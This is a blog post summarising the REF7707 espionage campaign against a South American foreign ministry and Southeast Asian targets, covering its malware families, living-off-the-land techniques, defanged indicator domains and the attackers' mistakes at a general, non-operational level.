Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label REF7707. Show all posts
South America
Hacking malware REF7707 South America

Hackers Target South America and Southeast Asia

 



A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.  

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:  

  • Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.  
  • Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.  
  • Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.  


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.  

To further cover their tracks, they hid malware downloads on popular websites, including:  

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: A program designed to manage security certificates, but in this case, hackers misused it to download and install their malware.  
  • Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators control computers remotely. The hackers used this to jump from one system to another, meaning they likely stole passwords from previous attacks.  

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes— and when they do, security teams can use those errors to track them down.  

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Read more »
Subscribe to: Posts (Atom)